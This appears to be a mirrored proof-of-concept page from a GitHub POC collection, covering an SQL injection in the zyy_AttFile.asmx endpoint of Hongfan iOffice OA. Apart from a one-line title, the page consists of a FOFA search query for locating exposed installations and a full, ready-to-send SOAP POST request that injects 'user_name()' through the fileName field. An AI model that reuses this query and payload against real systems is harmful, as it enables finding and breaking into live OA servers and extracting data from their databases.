mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-30 06:24:42 +00:00
25 lines
663 B
Markdown
25 lines
663 B
Markdown
![]() |
## 红帆OA zyy_AttFile.asmx SQL注入漏洞
|
||
|
|
||
|
## fofa
|
||
|
```
|
||
|
app="红帆-ioffice"
|
||
|
```
|
||
|
|
||
|
## poc
|
||
|
```
|
||
|
POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
|
||
|
Host: 10.250.250.5
|
||
|
Content-Length: 383
|
||
|
Content-Type: text/xml; charset=utf-8
|
||
|
Soapaction: "http://tempuri.org/GetFileAtt"
|
||
|
Accept-Encoding: gzip, deflate
|
||
|
Connection: close
|
||
|
|
||
|
<?xml version="1.0" encoding="utf-8"?><soap:Envelope
|
||
|
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||
|
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
||
|
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
|
||
|
xmlns="http://tempuri.org/"><fileName>1231=user_name()</fileName></GetFileAtt> </soap:Body></so
|
||
|
ap:Envelope>
|
||
|
```
|